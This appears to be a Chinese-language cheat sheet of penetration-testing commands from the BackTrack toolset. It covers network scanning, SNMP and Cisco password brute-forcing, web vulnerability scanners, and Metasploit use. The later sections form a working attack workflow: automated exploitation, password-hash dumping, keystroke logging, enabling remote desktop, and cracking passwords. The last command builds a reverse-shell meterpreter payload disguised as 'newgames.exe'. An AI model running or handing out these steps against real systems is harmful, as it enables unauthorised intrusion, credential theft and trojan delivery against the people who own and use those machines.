1.配地址:ifconfig eth1 10.1.1.100 netmask 255.255.255.0
配默认网关:route add default gw 10.1.1.254
看路由表 netstat -r
修改DNS etc resolv.conf
2.arping穿越局域网个人电脑防火墙,查看特定IP时候正被使用
arping -c 3 10.1.1.1
fping 使用ICMPECHO 能对整个网段快速扫描查看存活主机
fping -s(打印) -r(ping次数) 1 -g(范围)10.1.1.1 10.1.1.100
genlist 只显示结果的ping
genlist -s 10.1.1.\*
hping3 能通过的手动自定义产生包
hping3 回车
发包:hping send {ip(daddr=10.1.1.1)+icmp(type=8,code=0)}
收包:hping recv eth1h
nbtscan 10.1.1.1-254
nping 允许产生各种网络数据包(TCP,UDP,ICMP,ARP)也允许用户自定义协议头部,如:源和目的,
TCP和UDP端口号
nping -c 1 --tcp -p 80 --flags syn 10.1.1.1
nping -c 1 --tcp -p 80 --flags ack 10.1.1.1(服务器re掉)
nping -c 1 --udp -p 80 10.1.1.1(端口不可达)
onesixtyone是一个snmp扫描工具,用于找到设备上的SNMP Community自串
./onesixtyone -c dict.txt 10.1.1.2
protos用于扫描特定主机上支持的协议,特别是路由器
./protos -i eth0 -d 10.1.1.1 -v
3.操作系统指纹
p0f被动的操作系统指纹工具,被动识别技术
p0f
主动识别OS指纹探测工具
xprobe2 10.1.1.1
4.端口扫描
autoscan
netifera 功能还行
nmap -v -n -sP 10.1.1.0/24 比较快的探测活动主机
nmap -v -n -A 10.1.1.0/24(综合性扫描)
amap服务探测,对端口号进行查看,检测特定端口的运用
amap -bq 10.1.1.2 80
./httpint -h 10.1.1.1 sigmature.txt
ike-scan -M -v 10.1.1.2
sslscan 10.1.1.2 扫描策略
5.漏洞发现
cisco auditing tool 安全审计工具
./CAT -h 10.1.1.2 -w lists/community -a lists/passwords -i
cisco passwod scanner 发现有默认密码的设备,对一个网段
./ciscos 10.1.1 3 -t 4 -C 10
ADMsnmp 暴力破解snmp
./ADMsnmp 10.1.1.2 -wordf snmp.passwd
./snmpenum.pl 10.1.1.2 private cisco.txt
./snmpeum.pl 10.1.1.1 private windows.txt 在已经知道private密码后,获取一些重要信息
6.HTTP工具
Burp Suite能够分析和攻击web运用,通过手动和自动的技术
cd /pentest/web/burpsuite/
java -jar burpsuite_v1.4.jar
Grendel Scan 网页漏洞扫描工具
cd /pentest/web/grendel-scan
./grendel.sh
Nikto2是一个高级web服务器安全扫描工具,扫描检测由于服务器配置失误造成的安全隐患
/pentest/web/nikto:./nikto.pl -h 10.1.1.1 -C -p 80 -T 3478b -t 3 -D \ v -o webtest -F htm
W3AF 协助检测攻击web脆弱性
/pentest/web/w3af:./w3af console
/help
w3af/plugins:output console,htmlFile
output config htmlFile
set verbose True
set fileName testreport.html
back
output config console
view
set verbose False
back
audit htaccessMethods,osCommanding,sli,xss
back
set target http://10.1.1.1/
back
start
WAFW00F是一个用来探测WAF的工具
:/pentest/web/waffit:./wafw00f.py http://10.1.1.1/
Samrdump:用于访问(DCE/RPC)服务,能列出所有的系统服务, 用户账号等
:/pentest/python/impacket-examples:./sam rdump.py cisco:
[email protected] 445/SMB
综合漏洞工具Nesses
/etc/init.d/nessusd start
7.社会工程学工具
cd /pentest/exploits/set
cd config
nano set config
cd ..
./set
8.运用层攻击MSF
进入MSF :msfconsole
数据库:db_hosts
db_del_host 10.1.1.2
db_services
db nmap -T Aggressive -sV -n -O -v 10.1.1.2
db_autopwn -h
db_autopwn -p -t -e/-I 10.1.1.2
sessions -i 1
getuid
run hashdump
ps
misgrate 1576
keyscan_start
keyscan_dump
keyscan_stop
run getgui -e
rdesktop 10.1.1.2:3389
run getgui -u cisco -p cisco
exit
exit -y
9.用户名密码
cd /pentest/passwords/
ophacrack -g -d ~/tables_xp_free_small/ -t ~/tables_xp_small/ -f ~/sam-new-test
10.MSF离线攻击
制造离线攻击脚本:
cd /pentest/exploits/frameworks3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=33333 X > /tmp/newgames.exe